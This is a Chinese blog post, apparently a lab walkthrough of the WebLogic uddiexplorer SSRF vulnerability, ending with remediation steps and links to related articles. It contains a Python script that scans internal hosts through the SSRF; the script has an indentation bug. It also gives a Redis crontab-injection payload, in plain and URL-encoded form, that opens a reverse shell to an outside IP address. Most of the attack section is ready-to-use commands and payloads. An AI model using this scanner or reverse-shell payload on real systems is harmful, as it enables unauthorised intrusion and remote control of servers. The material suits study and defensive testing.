中间件漏洞 | weblogic-ssrf

最新推荐文章于 2023-11-06 08:56:08 发布
最新推荐文章于 2023-11-06 08:56:08 发布
阅读量795 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: 中间件 python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127216217
版权

文章目录

靶场:ssrf

介绍

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,探测内网IP及端口的开放情况,进而攻击内网中redis、fastcgi等脆弱组件。

漏洞版本:weblogic 10.0.2-10.3.6

步骤
攻击流程图

在这里插入图片描述

漏洞验证:利用ssrf探测内网
  1. 访问http://your-ip:7001/uddiexplorer/,无需登录就可以自动跳转到uddiexplorer应用
    在这里插入图片描述
  2. 看表单,找url
    在这里插入图片描述
  3. 抓包,发现有可传入url的参数
    在这里插入图片描述
  4. 探测端口,存在返回404,存在SSRF漏洞
    在这里插入图片描述
  5. 端口不存在
    在这里插入图片描述
  6. 非http协议
    在这里插入图片描述
  7. 通过错误的不同,去探测内网状态,确定哪些IP地址的哪些端口是开放的。
漏洞利用:利用Redis反弹shell

  1. 利用脚本探测内网端口开放情况

    # 环境:python2.7

import thread
import time
import re
import requests


def ite_ip(ip):
    for i in range(1, 256):
        final_ip = "{ip}.{i}".format(ip=ip, i=i)
        print(final_ip)
        thread.start_new_thread(scan, (final_ip,))
        time.sleep(3)


def scan(final_ip):
    ports = (
        '21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899',
        '8080',
        '7001', '8000', '6389', '6379')
    for port in ports:
        vul_url = 'http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (
            final_ip, port)
    try:
        # print vul_url
        r = requests.get(vul_url, timeout=15, verify=False)
        result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException', r.content)
        result2 = re.findall('but could not connect', r.content)
        result3 = re.findall('No route to host', r.content)
        if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
            print("[!]" + final_ip + ':' + port)
    except Exception, e:
        pass


ip = "172.18.0"
if ip:
    print(ip)
    ite_ip(ip)
else:
    print ("no ip")

  2. 端口开放结果,内网主机172.18.0.2开放了Redis服务器端口
    在这里插入图片描述

  3. 传入http://172.18.0.2:6379证明端口开放
    在这里插入图片描述

  4. Redis未授权访问
    简介

    redis是一个key-value存储系统。它支持存储的value类型:string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。

    原因

    redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上。如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作

  5. 反弹shell

  6. 监听端口
    在这里插入图片描述

  7. Redis命令的理解
    Redis SET 命令

    Redis SET 命令用于设置给定 key 的值。如果 key 已经存储其他值, SET 就覆写旧值,且无视类型。

    Redis Config Set 命令

    Redis Config Set 命令可以动态地调整 Redis 服务器的配置(configuration)而无须重启

    Redis Save 命令

    Redis Save 命令执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。

    Redis命令执行特性

    如果Redis命令不是以*开头,那则表明这个命令是 PROTO_REQ_INLINE 类型的命令请求,并不是 RESP 协议请求。这类命令也被称为管道命令,命令和命令之间是使用换行符\r\n(URL编码为%0D%0A)分隔开来。

    命令

    set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/20.210.90.167/8080 0>&1' \n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

    理解

    第一行:设置key为1,value为\n\n\n\n* * * * * root bash -i >& /dev/tcp/20.210.90.167/8080 0>&1\n\n\n\n
    第二行:新建一个目录dir/etc/
    第三行:新建一个文件dbfilenamecrontab
    第四行:将上面数据和命令保存save
    因为原本就有了/etc/crontab(这是个定时文件),因此用config set修改时无需重启。定时文件执行时触发反弹shell。

  8. URL编码
    在这里插入图片描述需要将换行处的%0A手动改为%0D%0A

    test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F20.210.90.167%2F8080%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

  9. 发送GET请求
    在这里插入图片描述

  10. 反弹shell成功,getshell
    在这里插入图片描述

修复

  1. 删除uddiexplorer文件夹,限制uddiexplorer应用只能内网访问
    在这里插入图片描述

  2. 将SearchPublicRegistries.jsp直接删除
    在这里插入图片描述

  3. 改后辍,修复步骤如下:
    1. 将weblogic安装目录下的wlserver_10.3/server/lib/uddiexplorer.war做好备份
    2. 将weblogic安装目录下的server/lib/uddiexplorer.war下载
    3. 用winrar等工具打开uddiexplorer.war
    4. 将其下的SearchPublicRegistries.jsp重命名为SearchPublicRegistries.jspx
    5. 保存后上传回服务端替换原先的uddiexplorer.war
    6. 对于多台主机组成的集群,针对每台主机都要做这样的操作
    7. 由于每个server的tmp目录下都有缓存所以修改后要彻底重启weblogic(即停应用–停server–停控制台–启控制台–启server–启应用)

    Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。

c4fx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
【vulhub】weblogic ssrf漏洞复现
weixin_53730939的博客
03-19 460
【vulhub】weblogic ssrf漏洞复现(详解)
SSRF_weblogic漏洞复现
weixin_42786460的博客
09-10 83
SSRF_weblogic漏洞复现
Weblogic SSRF漏洞复现
huangyongkang666的博客
07-22 1151
Weblogic SSRF漏洞复现
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 761
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
漏洞复现】Weblogic SSRF漏洞复现
Miraitowax
02-22 856
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
Weblogic-SSRF漏洞复现
hacker3062的博客
09-11 253
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现…Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所以SSRF的一大利用是探测内网端口开放信息。
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
weblogic-framework:网络逻辑框架
03-25
weblogic-framework是检测weblogic漏洞的最佳工具。 免责申明 本工具仅适用于安全技术研究,可以使用本工具发起网络黑客攻击,造成的法律后果,请使用者自负。 使用方式 常用突破 由于Weblogic的补丁是互斥的,安装...
K8 weblogic-CVE-2018-2628-getshell
07-16
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用! K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用!
SSRF漏洞简析
qq_42383069的博客
12-03 934
SSRF漏洞简析1.漏洞介绍2.漏洞成因3.漏洞流程梳理4.简要总结5.在centos下测试6.利用方式7.常见的防御方法8.ssrf常发生的位置 1.漏洞介绍 SSRF服务器端请求伪造漏洞: 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的是目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) 2.漏洞成因 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。
weblogicssrf漏洞修复_Weblogic-SSRF漏洞的复现
weixin_39922361的博客
12-22 371
一、环境靶机:centos7虚拟机 ip:192.168.8.11物理机:windows10burp suite二、原理SSRF原理:是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所...
Weblogic ssrf漏洞复现
最新发布
wutiangui的博客
11-06 250
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
SSRF02】服务器端请求伪造——WebLogic架构漏洞复现之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 3995
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞进行内网扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell。
weblogicssrf漏洞修复_Weblogic SSRF漏洞
weixin_35860326的博客
12-09 617
一、漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。二、漏洞环境搭建: 1、使用docker+vulhub安装(菜没有办法)2、查看是否安装成功(注意需要访问的是7001端口)成功安装三、漏洞验证 1、验证漏洞是否存在,点击Search P...
weblogic管理控制台未授权远程命令执行漏洞weblogic SSRF漏洞复现
weixin_48739941的博客
04-21 1504
1 weblogic管理控制台未授权远程命令执行漏洞复现 (1)cd CVE-2020-14882 切换目录。 (2)docker-compose up -d 启动。 (3)访问http://192.168.241.128:7001/console (4)http://192.168.241.128:7001/css/%252e%252e%252fconsole.portal绕过漏洞,未授权访问后台管理页面。 (5)burpsuite抓包。 (6)send to repe..
weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值